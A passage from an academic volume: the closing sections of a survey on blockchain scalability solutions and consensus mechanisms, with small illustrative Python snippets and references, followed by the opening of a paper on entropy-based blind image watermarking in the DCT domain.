to solve the scalability challenge, but all face some problems, and to address their
limitations, more solutions are needed [15].

4.4 Consensus Mechanisms

Different consensus mechanisms have been introduced to solve the blockchain scalability
problem after proof of work (PoW) and proof of stake (PoS). According to
requirements, multiple types of protocols have been developed.
Some consensus mechanisms are Delegated Proof of Stake (DPoS), Practical
Byzantine Fault Tolerance (PBFT), Delegated Byzantine Fault Tolerance (DBFT),
Federated Byzantine Agreement (FBA), Proof of Authority (PoA), Proof of Capacity
(PoC), Proof of Participation (PoP), Proof of Stake Velocity (PoSV), Proof of Burn
(PoB), Proof of History (PoH), Proof of Importance (PoI), Proof of Believability
(PoBelievability), Proof of Elapsed Time (PoET), and Proof of Activity (PoA) [6,
15, 17, 18]. The platforms of blockchain technology are categorized into permissionless
networks, permissioned networks, and consortium networks (a combination of
permissionless and permissioned networks).
Table 1 lists the platforms that use one or more consensus mechanisms
and different types of architecture to reduce the blockchain scalability challenge
according to the requirements of their application [19–22].

Table 1 Blockchain platforms using different network, architecture and consensus mechanism

Platform | Network type | Architecture | Consensus mechanism | tps
Bitcoin | Public | Single chain | PoW | 7 tps
Ethereum | Public | Single chain | PoW, PoS | 15–20 tps
Hyperledger | Private/Consortium | Single chain | PoET, PBFT | 3500 tps
R3 Corda | Private/Consortium | Single chain | PBFT | 15–1678 tps
Achain | Public | Parallel chain | PoW, PBFT, PoS | 1000 tps
Nxt Blockchain | Public/Consortium | Single chain | PoS | 100 tps
Ardor | Public/Consortium | Parent–child chain | PoS | –
Chain Core | Private/Consortium | Single chain | PoA | –
EOS | Private | – | PoS, PBFT | 3996 tps
IOTA Tangle | Public | DAG | PoW | 100–140 tps
Multichain | Private | Main chain, Off-chain | PoW | 2000–2500 tps
Quorum | Private | – | PoS, PBFT | –
Slimcoin | Public/Private | – | PoB | –
Tendermint | Private/Consortium | Single chain | PoC | 10,000 tps

4.5 Other Latest Protocols/Solutions to Scale Blockchain

Block propagation time is closely related to network bandwidth; a node with higher
bandwidth gets a block sooner than a node with less bandwidth. A node with 500
Mbps bandwidth takes on average 1.55 s to receive a block, while a node with 256 kbps
bandwidth takes 71.71 s on average. The block propagation time is the time needed
for a miner to receive a new block, and to optimize the blockchain system, a better neighbor
selection algorithm is used to reduce it. In FastChain [23]
(a protocol to scale blockchain), lower bandwidth nodes send blocks to higher bandwidth
nodes, and the higher bandwidth nodes then send the blocks to the rest of the nodes. Miners
with limited bandwidth favor nodes with higher bandwidth and disconnect themselves
from others. The FastChain implementation is divided into a bandwidth monitoring phase
and a neighbor update phase. In the bandwidth monitoring phase, each node maintains an
up-to-date bandwidth table. In the neighbor update phase, each miner periodically refreshes
its neighbor connections. The NS3 simulator is used for experimentation, and in the results,
FastChain increases the effective block rate (number of blocks added to the chain) by up to 40%
and the throughput by 20–40% compared to bitcoin. This solution has some limitations: each network
node has to maintain an up-to-date bandwidth table and periodically refresh its neighbor
connections, and miners with limited bandwidth are always dependent
on higher bandwidth nodes.
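The neighbor update idea can be pictured with a few lines of code: each node keeps a table of measured peer bandwidths and periodically keeps only the fastest peers as neighbors. This is a hedged sketch of the general idea, not FastChain's actual protocol logic; the table values and the number of neighbors kept are made up for the example.

```python
def update_neighbors(bandwidth_table: dict[str, float], max_neighbors: int = 3) -> list[str]:
    """Keep the peers with the highest measured bandwidth (in Mbps) as neighbors."""
    ranked = sorted(bandwidth_table, key=bandwidth_table.get, reverse=True)
    return ranked[:max_neighbors]

# Hypothetical bandwidth measurements collected during the monitoring phase.
table = {"peerA": 500.0, "peerB": 0.256, "peerC": 120.0, "peerD": 45.0, "peerE": 900.0}
print(update_neighbors(table))   # ['peerE', 'peerA', 'peerC']
```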
In PoW, if two miners solve the hash at the same time, the blockchain will add the block
that is accepted by the majority of nodes (at least 51%), and the resources the other miner
put into mining its block are wasted. To overcome this problem, solo
mining is replaced by parallel mining [24]. Parallel mining requires a manager to
ensure that no two miners use the same nonce value. The manager distributes the
transaction hash and groups of nonces to each active miner, and a miner who solves a
block becomes the next manager. The GX library of Golang is used for experimentation,
and the results show an improvement in the scalability of PoW of up to 34% compared to the
present situation. Some limitations are that a miner with more processing power
will be able to try more nonce values, which increases its probability
of becoming the manager, and all miners have to depend on the manager to obtain the
transaction hash and nonces. If the manager goes offline or fails to respond, a
single point of failure arises in this solution.
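The manager's job of ensuring that no two miners try the same nonce can be pictured as partitioning the nonce space into disjoint ranges, as in the sketch below. This is a simplified illustration under the assumptions of a 32-bit nonce space and a fixed miner count; it is not the actual implementation evaluated in [24].

```python
def nonce_ranges(num_miners: int, nonce_bits: int = 32) -> list[range]:
    """Split the nonce space into disjoint, near-equal ranges, one per miner."""
    space = 2 ** nonce_bits
    step = space // num_miners
    return [range(i * step, space if i == num_miners - 1 else (i + 1) * step)
            for i in range(num_miners)]

# The manager hands each active miner the transaction hash plus one of these ranges.
for miner_id, r in enumerate(nonce_ranges(4)):
    print(f"miner {miner_id}: nonces {r.start}..{r.stop - 1}")
```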
The sharding technique has three components: (1) assigning nodes to shards; (2) an intra-
shard consensus protocol; and (3) cross-shard transactions (to remove the double-
spending problem). OmniLedger [25] modified the Elastico sharding protocol
and tried to reduce the limitations of the Elastico protocol. OmniLedger adopts the unspent
transaction output (UTXO) model, the same as bitcoin. By combining ByzCoin and
PBFT, it introduced the ByzCoinX consensus for shards. It combines RandHound with
Algorand so that the set of validators is periodically rotated; the role of the validators is to
assign and verify the tasks of the shards. The OmniLedger solution also introduced the Atomix
protocol, which uses a two-phase client-driven "lock/unlock" mechanism for the commit or rejection
of proofs. OmniLedger uses an anti-Sybil attack method to automatically handle cross-
shard transactions. Its dataset contains the first 10,000 blocks of the bitcoin blockchain. For
experimentation, 60 physical machines, each with an Intel E5-2420 v2 CPU
and 24 GB RAM, were used. This protocol can process 6000 tps (practically 5000) and
takes 20 s confirmation time with 1800 nodes. In OmniLedger, any user interacts
with other users and actively participates in cross-shard transactions, which is very
difficult for lightweight users to satisfy.
A scale-out blockchain for value transfer with spontaneous sharding [26] is a completely
novel solution based on some assumptions. It contains individual chains and a main chain
in its off-chain architecture. The value transfer ledger (VTL) model passes values from one
node to another. A proof is associated with each piece of value, and as the value moves from
one node to another, the size of the proof increases. The phases of this solution are:
(1) individual chains contain their own transactions in first-in-first-out order; (2) the main
chain uses the PBFT consensus protocol, and each verified block from an individual chain has
the signature of the corresponding node, called an abstract, and also contains its proofs;
(3) a validation scheme is used for the validation of transactions. In the validation phase,
whether a transaction is valid or not depends on the collected proofs. This solution is purely
theoretical and assumes that each node is honest and cooperative. The design is useful only
for micropayment-based applications.
A scalable and extensible blockchain [27] system uses multiple chains with a sharding
method for large-scale business applications. A large number of transactions on a
single chain degrades system performance and also creates traffic in the system.
The design includes a single main chain with a set of subchains, and a value swap layer is
used for communication between chains; the aim of the value swap layer is to circulate assets
among the different chains. The subchain nodes handle a large number of services
such as exchange transactions, e-commerce, supply chain, etc. They build a Merkle tree
over their transactions and blocks and submit the Merkle tree root hash, a timestamp,
and metadata to the main chain. The main chain validators verify the signature and
the data received from the subchain, and the main chain accepts the verified blocks and adds
them into the permanent chain.
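The Merkle root that a subchain submits to the main chain can be computed as in the following sketch, which hashes transactions pairwise with SHA-256 until a single root remains. Duplicating the last hash when a level has an odd number of nodes follows bitcoin's convention and is an assumption here, since [27] does not spell out that detail.

```python
import hashlib

def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def merkle_root(transactions: list[bytes]) -> bytes:
    """Compute a Merkle root by repeatedly hashing pairs of nodes."""
    level = [sha256(tx) for tx in transactions]
    while len(level) > 1:
        if len(level) % 2 == 1:          # duplicate the last node on odd levels
            level.append(level[-1])
        level = [sha256(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]

txs = [b"alice->bob:5", b"bob->carol:2", b"carol->dave:1"]
print(merkle_root(txs).hex())
```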
Each network node has its own copy of the ledger in a blockchain-based system. Verified
blocks are added into the chain, and the size of the chain becomes larger day
by day. Because the ledger occupies more space, it takes more time in the verification
process, which affects blockchain scalability. To smooth the verification process and
save space, this solution presents the idea of summary blocks and of compressing
the summary blocks [28]. The solution uses a block summarization algorithm and the
deflate compression algorithm. For experimentation, blocks 200,000–250,000 of the bitcoin
blockchain are used. Using this solution, network nodes store a limited data
size, and the results show an improvement in the transaction verification process. During
implementation, the method faces several problems, and there is no standard for
block summarization and block compression that is able to maximize the value of
the space saving.
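To make the idea concrete, the sketch below summarizes a block by keeping only a few fields and then compresses the serialized summary with zlib, which implements the deflate algorithm. The chosen summary fields and the block contents are assumptions made for illustration; the paper's own summarization rules are not reproduced here.

```python
import json
import zlib

def summarize_block(block: dict) -> dict:
    """Keep only the fields assumed to be needed for later verification."""
    return {
        "height": block["height"],
        "merkle_root": block["merkle_root"],
        "unspent_outputs": block["unspent_outputs"],
    }

block = {
    "height": 200_000,
    "merkle_root": "a3f1".ljust(64, "0"),
    "transactions": [f"tx{i}" for i in range(1000)],   # dropped by the summary
    "unspent_outputs": ["tx7:0", "tx42:1"],
}

raw = json.dumps(block).encode()
summary = zlib.compress(json.dumps(summarize_block(block)).encode())  # deflate
print(len(raw), "bytes raw ->", len(summary), "bytes summarized and compressed")
```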
Each shard is a separate network node in the sharding method. This solution adds
an "inspector node" [29] alongside the validator nodes, which makes sharding-based
blockchains more effective and secure. If an attacker takes over the majority of
a shard, he or she can submit malicious transactions in the shard that get added into the main
chain. The inspector node investigates such malicious activities going on in the shard and
eliminates them. All the nodes are reshuffled by a random sampling method if any suspicious
activity is found by an inspector node, and the funds involved in a malicious transaction are
transferred to the inspector node. This theoretical solution provides better security
for sharding-based blockchain applications.
The cross-shard transaction is the biggest challenge faced by the sharding method,
as it increases the confirmation time. All shards involved in a cross-shard transaction
need to execute multi-phase protocols to confirm the transaction's authenticity.
OptChain [30] gives a solution to improve the cross-shard transaction process. It optimizes
the placement of transactions into shards rather than using a random placement strategy, and it
modifies the simple payment verification protocol; PageRank analysis is used to place
transactions into shards. The dataset contains the first 10 million bitcoin transactions
(10,000,000). The OverSim framework, used to simulate a system on OMNeT++ 4.6, is used
for experimentation. This protocol can process 6000 tps with 16 shards and takes
10.5 s confirmation time. The solution reduces the latency by 93% and increases the
throughput by 50% in comparison with OmniLedger. OptChain is compared with
only the OmniLedger sharding protocol, and the authors predict that it will give similar
results when compared with other sharding protocols. It is implemented in existing wallet
software, so it is useful only for the payment module. This protocol improves the cross-shard
transaction process; the remaining core components of a sharding protocol, (1) assigning
nodes to shards and (2) the intra-shard consensus protocol, are not included.
Ethereum introduced the concept of smart contracts and decentralized applications
(Dapps). The on-chain execution of smart contracts increases the confirmation time, which
degrades system performance. This solution executes smart contracts in
on-chain and off-chain phases to check the performance of the system. It uses a
hybrid on/off-chain computation model and has a plug-and-play approach
that is compatible with existing smart contract systems. The Solidity language is used to
write the smart contracts, and the Kovan test network, which is Ethereum's official test network,
is used for experimentation. This solution assumes that all the network nodes are honest
[31].
The Hyperledger Fabric platform supports private and consortium blockchain networks.
Hyperledger Fabric v.1.4 [32] allows developers to select a consensus
interface to provide an ordering service; the consensus interface is either Solo or
Kafka. It supports either LevelDB or CouchDB as the state database. Smart
contracts can be written in languages such as Golang, JavaScript, and Java. This study
used the Solo (only one orderer) ordering service and CouchDB in the
deployment model, and the smart contracts were written in JavaScript. The entire
deployment was installed and run on the Linux (Ubuntu) operating system, and 1000 and 5000
transactions were generated for the first and second rounds, respectively, as the dataset. The
blockchain benchmark tool Hyperledger Caliper was used to evaluate the results. The results of
this case study show that Hyperledger Fabric handles up to 100,000 nodes (participants)
on the selected AWS EC2 instance. AWS is Amazon Web Services, which
provides virtual machines on rent on which users can deploy their applications.
Hyperledger Fabric v.1.4 can process up to 200 tps with 0.01–0.16 s confirmation
time. In comparison, the sharding protocol SSChain can handle more than 6500 tps with 1800
network nodes [33].
Proper partitioning is the first step in the sharding technique, and if the design of the
partitioning is not systematic, the performance of the system degrades instead of
improving. The Ethereum blockchain is taken as a graph to evaluate partitioning. For
evaluation, five methods are used: hashing, the Kernighan–Lin algorithm, METIS, R-METIS, and
TR-METIS. The metrics used for performance measurement are the balance of
shards, the transactions taking part in multiple shards, and the amount of data that would
be relocated across shards upon repartitioning of the graph. The results show that the
hashing and Kernighan–Lin algorithms perform better partitioning. If the sharding method
were implemented in Ethereum, it would change the design of the blockchain [36]. Table
2 summarizes all the latest solutions with their datasets, experimental devices,
network sizes, and results after evaluation.

Table 2 Performance summary of latest solutions for blockchain scaling

Solution | Dataset | Experimental device | Network nodes | Transactions per second | Confirmation time | Ref
Elastico | – | Amazon EC2 for network setup | 1600 | 1600 tps | 711 s | [34]
FastChain | – | NS3 simulator | – | Improves the throughput by 20–40% compared to bitcoin | – | [23]
A parallel proof of work | – | GX library of Golang | – | 34% increase compared to bitcoin | – | [24]
OmniLedger | First 10,000 blocks of the bitcoin blockchain | 60 physical machines | 1800 | 6000 tps | 20 s | [25]
Block summarization and compression | Blocks 200,000–250,000 of the bitcoin blockchain | – | – | Transaction verification process improved | – | [28]
OptChain | First 10 million bitcoin transactions (10,000,000) | OverSim framework on OMNeT++ 4.6 | – | 6000 tps | 10.5 s | [30]
On/off-chain smart contracts design | – | Ethereum official test network Kovan | – | – | – | [31]
Hyperledger Fabric v.1.4 | 1000 and 5000 transactions generated for the first and second rounds, respectively | AWS EC2 instance for network setup and Hyperledger Caliper for result evaluation | 100,000 | 200 tps | 0.01–0.16 s | [32]
SSChain | – | 60 physical machines | 1800 | 6500 tps | – | [33]
RapidChain | About 5 million transactions processed | Go used to evaluate performance | 4000 | 7380 tps | 8.7 s | [35]

5 Future Scope of Blockchain Technology

5.1 When Blockchain Technology Will be Combined with Other Technology

The Internet of things (IoT) has received a lot of attention from academia, society, and industry,
as many business processes, human activities, and services have been
improved by using IoT. It has some challenges that need to be solved, such as trust, security, and
overhead. It is expected that the IoT ecosystem will become smarter and more efficient
using blockchain technology. IoT produces a large amount of data, and blockchain
can process only a limited number of transactions, so in the present situation it is difficult for
blockchain to process the data produced by IoT [37]. Blockchain has enough capacity
to store important data in a distributed and secure manner. Blockchain also gives assurance
that data is original; as a result, it enables accurate data analysis when combined with big
data analysis [38]. Industrial development is dependent on reliable partnerships, but its
growth is hindered by increasing cybercrime and fraud. Blockchain can be very
useful in reducing these kinds of challenges, and industrial development would improve further
by merging blockchain technology with IoT and cloud technology [5].

5.2 Benefits that Blockchain Technology and Smart Contract Could Bring to All Sectors

Blockchain provides a distributed, secured, and traceable environment, whereas smart
contracts provide self-execution. Merging both can solve many problems faced by
the real world. A smart contract is lines of code stored on the blockchain that execute automatically
(self-verifying, self-executing, and tamper-resistant) when the conditions
in it are satisfied. It is an event-driven program that runs on a blockchain platform
and does not need any kind of monitoring. The consensus protocol is used to
run the sequence of events included in the smart contract. Different kinds of
consensus protocols have been introduced according to the requirements of applications, and
in the future their number may increase. The benefits of smart contracts are real-time operation,
accuracy, lower cost, and time saving. Any application can be built without the requirement of
a third party by combining blockchain and smart contracts, and such an application is also
reliable and secure. Some use cases are supply chain, Internet of things, healthcare systems,
digital rights management, insurance, financial sectors, and real estate [39]. The smart contract
is in its early stage, and before implementation it is necessary to solve challenges such as
scalability, flexibility, and security.

5.3 Important Points Preventing Growth of Blockchain Technology

Cryptocurrency is not limited to bitcoin and Ethereum-based Ether; at present,
hundreds of cryptocurrencies have been introduced. It is necessary to design
a blockchain testing mechanism to test the quality of different blockchains. The testing
mechanism could include a standardization phase and a testing phase. The standardization
phase would test the quality of blockchains and check whether a new blockchain actually
works as its developers describe. In the testing phase, different criteria are used to test
the performance of the blockchain [38]. An implementation of blockchain has to give
assurance of security, privacy, high throughput, and data integrity. However, these
qualities set up a lot of challenges, such as scalability, interoperability, cost-effectiveness,
authentication, privacy, and security, that need to be addressed [40]. Blockchain technology
has many good features such as trust, transparency, automation, anonymity, security,
auditability, and decentralization [11, 38]. Despite all these good qualities, its development
is growing slowly due to the scalability problem. There are many studies and solutions on
blockchain scalability conducted by researchers; nevertheless, some solutions give an answer
only for the scalability problem and do not cover the decentralization and security aspects of
blockchain [11]. The open-source platforms Ethereum and Hyperledger are helpful for
building decentralized applications with public and private network types, respectively.
Blockchain provides security as it uses a peer-to-peer network, a distributed ledger, and
asymmetric encryption. By implementing this technology, many sectors such as the financial
sector, the healthcare service sector, mobile networking, and others can be converted from
existing centralized systems into secured decentralized systems. Industries and business
sectors are interested in blockchain technology, which can improve their existing
systems [41, 42]. Despite the great curiosity of the business sector to implement this
technology in their business processes, insufficient answers about the effectiveness of the
technology in practice prevent them from proceeding further. The limited number of solutions
for blockchain scalability and security also prevents them from adopting blockchain
technology.

5.4 SWOT Analysis of Blockchain Technology

A SWOT analysis is used to show the strengths, weaknesses, opportunities, and threats
of blockchain technology. Full transparency, no need for middlemen,
traceability, tamper-freedom, higher efficiency, lower risk, lower cost, decentralization,
distribution, immutability, security, reliability, accuracy, trust, and auditability are strengths
of blockchain technology. Scalability, storage issues, cybersecurity, the technology not being
fully developed, lack of standards, and lack of governance are weaknesses. Automation,
improvement in the supply chain, business process optimization, improved customer satisfaction
through transparency, innovation in every industry, and opportunities in IoT are its
opportunities. The need for much more research study is included in the threats to this technology
[43]. The research community needs to carry out detailed study and analysis in the context of
scalability and security for rapid development at the technological level [41].

6 Conclusion

After reviewing all the problems and solutions, we come to the conclusion that
one needs to simulate the existing technology and check its performance. The
scalability challenge needs to be researched by changing the consensus and
creating smart contract or protocol-level changes in the technology that push back
the limitations of the blockchain. Achieving this would give robust
applications in many domains.

References

1. Nakamoto, S. (2008). Bitcoin: A peer-to-peer electronic cash system. https://bitcoin.org/bitcoin.pdf
2. Vujičić, D., Jagodić, D., & Randić, S. (2018). Blockchain technology, bitcoin, and Ethereum:
A brief overview. In 2018 17th International Symposium Infoteh-Jahorina (INFOTEH) (pp. 1–6).
IEEE.
3. Wood, G. (2014). Ethereum: A secure decentralised generalised transaction ledger. Ethereum
Project Yellow Paper, 151(2014), 1–32.
4. Mahmood, B. B., Muazzam, M., Mumtaz, N., & Shah, S. H. (2019). A technical review on
blockchain technologies: Applications, security issues & challenges. International Journal of
Computing and Communication Networks, 1(1), 26–34.
5. Ahram, T., Sargolzaei, A., Sargolzaei, S., Daniels, J., & Amaba, B. (2017). Blockchain
technology innovations. In 2017 IEEE technology & engineering management conference
(TEMSCON) (pp. 137–141). IEEE.
6. Ismail, L., & Materwala, H. (2019). A review of blockchain architecture and consensus
protocols: Use cases, challenges, and solutions. Symmetry, 11(10), 1198.
7. Lopes, J., & Pereira, J. L. (2019). Blockchain projects ecosystem: A review of current technical
and legal challenges. In World Conference on Information Systems and Technologies (pp. 83–
92). Cham: Springer.
8. Puthal, D., Malik, N., Mohanty, S. P., Kougianos, E., & Das, G. (2018). Everything you
wanted to know about the blockchain: Its promise, components, processes, and problems.
IEEE Consumer Electronics Magazine, 7(4), 6–14.
9. Mechkaroska, D., Dimitrova, V., & Popovska-Mitrovikj, A. (2018). Analysis of the possibil-
ities for improvement of Blockchain technology. In 2018 26th Telecommunications Forum
(TELFOR) (pp. 1–4). IEEE.
10. Executive Summary. (2019). NASSCOM Avasant India Blockchain Report.
11. Xie, J., Yu, F. R., Huang, T., Xie, R., Liu, J., & Liu, Y. (2019). A survey on the scalability of
blockchain systems. IEEE Network, 33(5), 166–173.
12. Benčić, F. M., & Žarko, I. P. (2018). Distributed ledger technology: Blockchain compared to
directed acyclic graph. In 2018 IEEE 38th International Conference on Distributed Computing
Systems (ICDCS) (pp. 1569–1570). IEEE.
13. Croman, K., Decker, C., Eyal, I., Gencer, A. E., Juels, A., Kosba, A., & Song, D. (2016). On
scaling decentralized blockchains. In International conference on financial cryptography and
data security (pp. 106–125). Berlin: Springer.
14. Zheng, P., Zheng, Z., Luo, X., Chen, X., & Liu, X. (2018). A detailed and real-time perfor-
mance monitoring framework for blockchain systems. In: 2018 IEEE/ACM 40th International
Conference on Software Engineering: Software Engineering in Practice Track (ICSE-SEIP)
(pp. 134–143). IEEE.
15. Zhou, Q., Huang, H., Zheng, Z., & Bian, J. (2020). Solutions to scalability of blockchain: A
survey. IEEE Access, 8, 16440–16455.
16. Kim, S., Kwon, Y., & Cho, S. (2018). A survey of scalability solutions on blockchain. In 2018
International Conference on Information and Communication Technology Convergence (ICTC)
(pp. 1204–1207). IEEE.
17. Holotescu, V., & Vasiu, R. (2020). Challenges and emerging solutions for public
blockchains. BRAIN: Broad Research in Artificial Intelligence and Neuroscience, 11(1), 58–83.
18. Guo, H., Zheng, H., Xu, K., Kong, X., Liu, J., Liu, F., & Gai, K. (2018). An improved consensus
mechanism for blockchain. In International Conference on Smart Blockchain (pp. 129–138).
Cham: Springer.
19. Salah, K., Rehman, M. H. U., Nizamuddin, N., & Al-Fuqaha, A. (2019). Blockchain for AI:
Review and open research challenges. IEEE Access, 7, 10127–10149.
20. Moezkarimi, Z., Abdollahei, F., & Arabsorkhi, A. (2019). Proposing a framework for evalu-
ating the blockchain platform. In 2019 5th International Conference on Web Research (ICWR)
(pp. 152–160). IEEE.
21. Clincy, V., & Shahriar, H. (2019). Blockchain development platform comparison. In 2019
IEEE 43rd Annual Computer Software and Applications Conference (COMPSAC) (Vol. 1,
pp. 922–923). IEEE.
22. Saraf, C., & Sabadra, S. (2018). Blockchain platforms: A compendium. In 2018 IEEE
International Conference on Innovative Research and Development (ICIRD) (pp. 1–6). IEEE.
23. Wang, K., & Kim, H. S. (2019). FastChain: Scaling blockchain system with informed neighbor
selection. In 2019 IEEE International Conference on Blockchain (Blockchain) (pp. 376–383).
IEEE.
24. Hazari, S. S., & Mahmoud, Q. H. (2019). A parallel proof of work to improve transaction speed
and scalability in blockchain systems. In 2019 IEEE 9th Annual Computing and Communication
Workshop and Conference (CCWC) (pp. 0916–0921). IEEE.
25. Kokoris-Kogias, E., Jovanovic, P., Gasser, L., Gailly, N., Syta, E., & Ford, B. (2018).
Omniledger: A secure, scale-out, decentralized ledger via sharding. In 2018 IEEE Symposium
on Security and Privacy (SP) (pp. 583–598). IEEE.
26. Ren, Z., Cong, K., Aerts, T., de Jonge, B., Morais, A., & Erkin, Z. (2018). A scale-out blockchain
for value transfer with spontaneous sharding. In 2018 Crypto Valley Conference on Blockchain
Technology (CVCBT) (pp. 1–10). IEEE.
27. Yu, Y., Liang, R., & Xu, J. (2018). A scalable and extensible blockchain architecture. In 2018
IEEE International Conference on Data Mining Workshops (ICDMW) (pp. 161–163). IEEE.
28. Nadiya, U., Mutijarsa, K., & Rizqi, C. Y. (2018). Block summarization and compression
in bitcoin blockchain. In 2018 International Symposium on Electronics and Smart Devices
(ISESD) (pp. 1–4). IEEE.
29. Chauhan, A., Malviya, O. P., Verma, M., & Mor, T. S. (2018). Blockchain and scala-
bility. In 2018 IEEE International Conference on Software Quality, Reliability and Security
Companion (QRS-C) (pp. 122–128). IEEE.
30. Nguyen, L. N., Nguyen, T. D., Dinh, T. N., & Thai, M. T. (2019). OptChain: optimal transactions
placement for scalable blockchain sharding. In 2019 IEEE 39th International Conference on
Distributed Computing Systems (ICDCS) (pp. 525–535). IEEE.
31. Li, C., Palanisamy, B., & Xu, R. (2019). Scalable and privacy-preserving design of on/off-chain
smart contracts. In 2019 IEEE 35th International Conference on Data Engineering Workshops
(ICDEW) (pp. 7–12). IEEE.
32. Kuzlu, M., Pipattanasomporn, M., Gurses, L., & Rahman, S. (2019). Performance analysis of
a hyperledger fabric blockchain framework: Throughput, latency and scalability. In 2019 IEEE
International Conference on Blockchain (Blockchain) (pp. 536–540). IEEE.
33. Chen, H., & Wang, Y. (2019). SSChain: A full sharding protocol for public blockchain without
data migration overhead. Pervasive and Mobile Computing, 59, 101055.
34. Luu, L., Narayanan, V., Zheng, C., Baweja, K., Gilbert, S., & Saxena, P. (2016). A secure
sharding protocol for open blockchains. In Proceedings of the 2016 ACM SIGSAC Conference
on Computer and Communications Security (pp. 17–30).
35. Zamani, M., Movahedi, M., & Raykova, M. (2018). Rapidchain: Scaling blockchain via
full sharding. In Proceedings of the 2018 ACM SIGSAC Conference on Computer and
Communications Security (pp. 931–948).
36. Fynn, E., & Pedone, F. (2018). Challenges and pitfalls of partitioning blockchains. In 2018 48th
Annual IEEE/IFIP International Conference on Dependable Systems and Networks Workshops
(DSN-W) (pp. 128–133). IEEE.
37. Cao, B., Li, Y., Zhang, L., Zhang, L., Mumtaz, S., Zhou, Z., & Peng, M. (2019). When Internet of
Things meets blockchain: Challenges in distributed consensus. IEEE Network, 33(6), 133–139.
38. Zheng, Z., Xie, S., Dai, H., Chen, X., & Wang, H. (2017). An overview of blockchain tech-
nology: Architecture, consensus, and future trends. In 2017 IEEE international congress on
big data (BigData congress) (pp. 557–564). IEEE
39. Mohanta, B. K., Panda, S. S., & Jena, D. (2018). An overview of smart contract and use cases in
blockchain technology. In 2018 9th International Conference on Computing, Communication
and Networking Technologies (ICCCNT) (pp. 1–4). IEEE.
40. Koteska, B., Karafiloski, E., & Mishev, A. (2017). Blockchain implementation quality chal-
lenges: A literature. In SQAMIA 2017: 6th workshop of software quality, analysis, monitoring,
improvement, and applications (pp. 11–13).
41. Sandner, P., & Schulden, P. M. (2019). Speciality grand challenges: Blockchain. Front
Blockchain, 2, 1.
42. Lu, Y. (2019). The blockchain: State-of-the-art and research challenges. Journal of Industrial
Information Integration, 15, 80–90.
43. Niranjanamurthy, M., Nithya, B. N., & Jagannatha, S. (2019). Analysis of blockchain
technology: Pros, cons and SWOT. Cluster Computing, 22(6), 14743–14757.
Secured Blind Image Watermarking
Using Entropy Technique in DCT
Domain

Megha Gupta and R. Rama Kishore

Abstract In the current situation, we can communicate sound, video, and pictures
with the utmost ease. However, security and copyright of the media have turned into a
significant issue, so a rising method, known as digital watermarking, is utilized for
shielding digital media from counterfeiting and unapproved use. In this paper, a
blind image watermarking technique is presented which uses the entropy method
and watermark encryption with a predefined mathematical function to make the
process more robust, secure, and imperceptible. The watermark is inserted in the DCT
domain, which facilitates robustness in channels that implement bandpass filtering. To
provide objective evidence of the performance, the performance measures peak signal-
to-noise ratio (PSNR) and normalized correlation (NC) are used. The method can
achieve PSNR values greater than 40 dB, and the NC values are in the range of 0.9–1.
The proposed technique has been implemented in MATLAB 2020a, and on testing under
various attacks, the technique achieved a good balance between imperceptibility and
robustness.

Keywords Blind image watermarking · Secure watermarking · Entropy · Discrete cosine transform · Encryption · PSNR · NC · Robustness · Imperceptibility

M. Gupta (B) · R. Rama Kishore
University School of Information and Communication Technology, Guru Gobind Singh Indraprastha University, Delhi, India
e-mail: megha.phd160.usict2019@ipu.ac.in
R. Rama Kishore
e-mail: rama.kishore@ipu.ac.in
M. Gupta
Noida Institute of Engineering and Technology, Gr. Noida, U.P., India

1 Introduction

Digital Watermarking helps to protect digital media from counterfeiting and inap-
propriate use of data [1–3]. This technique has turned out to be successful, using the

watermarking technique which has helped in reducing the unfair distribution of the
data and violation of the copyright act [4, 5]. In this technique, we are able to get
a watermarked image by embedding secret information called a watermark on the
cover image [6, 7].
Earlier algorithms embedded and extracted watermarks through spatial
approaches, like the LSB (least significant bit) watermarking technique [8–10], in which
the LSBs of the cover image are used for watermarking. Algorithms based
on this method are not robust enough and can be disclosed through mathematical
analysis. Other, refined algorithms embed the watermark bits in the frequency domain of the
image; for instance, [11–13] placed the watermark in the frequency
spectrum to achieve high security and high reliability [14–16]. The algorithm given
by Shih [17] increased the capacity of the watermark's frequency domain and,
at the same time, maintained imperceptibility. Savakar [18] tried to maintain
the cover image statistics by using an embedding technique.
In the proposed watermarking technique, Shannon's entropy is used to find the
locations which are more robust for inserting the watermark bits, as defined by Garg and
Kishore [19]. As the introduced algorithm is blind, the actual watermark and host
image are not required at the time of extraction. The discrete cosine transform is used
as the embedding domain.
The rest of the paper is presented in multiple sections. Section 2 depicts a concise
summary of the work published in the domain of advanced digital watermarking
techniques. Section 3 describes the submitted digital image watermarking method.
Section 4 includes experimental results of the proposed work, which are
analysed to discover similarities and differences with the existing works.
Section 5 gives the recapitulation of the proposed work.

2 Related Work

In the proposed work, the DCT technique with entropy is used, so this section assesses
the work done in the field of digital watermarking using the entropy methodology. N.
A. Loan [20] gave a digital image watermarking technique dependent on entropy to
enhance imperceptibility and robustness. One low-frequency watermark and another
high-frequency watermark are embedded in this technique [21, 22]. The region with a
high entropy value is detected in the host image for embedding the watermark, and DWT
and SVD are put into application for inserting the watermark [23–26]. Yang et al. [27]
presented an information-masking model using the idea of entropy to advance the
robustness and imperceptibility in the temporal domain and spatial spectrum. Mehta
et al. [28] introduced an image watermarking method using block entropy where blocks
of high entropy are used for inserting the watermark with the LSB substitution
method.
Deljavan et al. [29] proposed a blind, HVS-based, transparent, scalable watermarking
algorithm based on DWT that is robust against scalable image coding. Selected
coefficients in the high-frequency sub-bands are chosen for embedding the watermark
upon analysing luminance, texture, and contrast; furthermore, selection of the
coefficients takes place through entropy and amplitude analysis. Application of multiple
levels of DWT on the watermark helps in obtaining a scalable representation of it
[30–32], and selected coefficients in the DWT sub-bands of the host image are used for
inserting the decomposed watermark sub-bands [33, 34].
Garg and Kishore [35] applied the entropy method to optimize the results; the watermark
bits are embedded in the blocks of low entropy instead of being embedded
in the complete image. Experimental results show that their technique satisfies both
imperceptibility and robustness. Mohammed et al. [36] used an HVS-based entropy
parameter for each block with the DWT and SVD domains. The method asserts that
embedding the watermark in these particular blocks provides more imperceptible and
robust results [37, 38]. Mehta et al. [39] adopted fuzzy entropy to embed the watermark
bits. Fuzzy entropy is used to discard the superfluous and inappropriate blocks
[40]; it helps to reduce the dimensionality of the watermark embedding
technique, and this provides better robustness [41, 42].
Based on the papers mentioned above, which are concerned with watermarking a
greyscale image, a block-entropy-based digital watermarking technique is used. The
introduced technique inserts the watermark in selected segments of the greyscale
image instead of embedding the watermark in the complete host image. The segments
